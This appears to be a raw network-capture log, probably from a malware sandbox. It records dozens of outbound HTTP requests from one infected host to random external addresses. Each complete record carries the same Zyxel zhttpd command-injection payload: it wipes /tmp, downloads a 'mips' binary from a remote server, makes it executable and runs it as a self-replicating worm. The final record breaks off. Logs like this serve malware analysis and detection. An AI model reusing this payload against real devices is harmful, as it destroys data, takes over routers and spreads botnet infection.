                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5801192.168.2.2353776114.216.105.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214554071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5802192.168.2.2340286105.179.254.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214651108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5803192.168.2.234394674.151.120.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214711905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5804192.168.2.234062493.11.133.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214768887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5805192.168.2.2342708182.74.231.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214828968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5806192.168.2.233654481.160.135.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214903116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5807192.168.2.2358220142.187.25.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.214963913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5808192.168.2.2358156222.110.175.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215049028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5809192.168.2.2333766114.145.103.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215114117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5810192.168.2.235863683.108.254.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215183020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5811192.168.2.2355190184.87.183.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215277910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5812192.168.2.2349786147.227.25.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215327024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5813192.168.2.235568459.210.1.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215400934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5814192.168.2.235638845.166.67.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215456963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5815192.168.2.2358520216.6.169.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215537071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5816192.168.2.2347852197.9.93.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215600014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5817192.168.2.2347940132.182.37.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215660095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5818192.168.2.2349288148.169.204.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215739012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5819192.168.2.234190059.74.206.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215806961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5820192.168.2.2348740186.114.138.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215888023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5821192.168.2.2345306120.106.226.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.215950012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5822192.168.2.233641225.12.107.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216021061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5823192.168.2.2345248169.210.22.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216095924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5824192.168.2.2345318143.163.111.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216196060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5825192.168.2.235011495.235.179.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216250896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5826192.168.2.2333916173.200.157.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216310024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5827192.168.2.2348834140.41.5.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216387987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5828192.168.2.234036057.145.150.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216480970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5829192.168.2.236097223.140.26.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216533899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5830192.168.2.233557092.24.75.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216605902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5831192.168.2.2349480205.139.83.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216682911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5832192.168.2.2349620105.64.0.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216732025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5833192.168.2.235808832.223.26.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216803074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5834192.168.2.2354032118.91.235.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216885090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5835192.168.2.234677469.19.149.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.216979980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5836192.168.2.2358120184.25.252.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217061043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5837192.168.2.233715241.168.72.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217127085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5838192.168.2.233561482.101.99.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217212915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5839192.168.2.235535825.123.248.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217255116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5840192.168.2.2350392173.190.236.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217324972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5841192.168.2.2349518102.38.163.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217392921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5842192.168.2.2350066130.160.84.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217464924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5843192.168.2.235731845.154.20.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217539072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5844192.168.2.2344334144.101.103.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217607975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5845192.168.2.235521893.204.189.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217667103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5846192.168.2.234382072.215.96.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217741013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5847192.168.2.235835865.25.128.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217808962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5848192.168.2.233331497.71.231.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217895985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5849192.168.2.2358066175.32.19.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.217956066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5850192.168.2.234582694.175.214.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218035936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5851192.168.2.2332828212.79.78.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218095064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5852192.168.2.234137023.126.234.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218174934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5853192.168.2.234290820.157.165.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218264103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5854192.168.2.233726099.107.246.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218317986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5855192.168.2.2339178148.98.210.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218379974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5856192.168.2.23488245.221.212.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218476057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5857192.168.2.2345330101.150.140.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218547106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5858192.168.2.235953260.116.151.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218592882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5859192.168.2.2359984138.107.230.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218661070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5860192.168.2.235099097.152.17.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218728065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5861192.168.2.234834453.227.118.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218839884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5862192.168.2.2355204166.161.239.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218913078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5863192.168.2.234660045.111.106.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.218964100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5864192.168.2.2346606193.167.214.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219078064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5865192.168.2.2360302144.54.215.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219114065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5866192.168.2.2346634221.175.79.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219189882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5867192.168.2.2359688142.81.121.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219243050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5868192.168.2.235708817.114.25.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219300985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5869192.168.2.2348790219.112.13.32443
                                        TimestampBytes transferredDirectionData
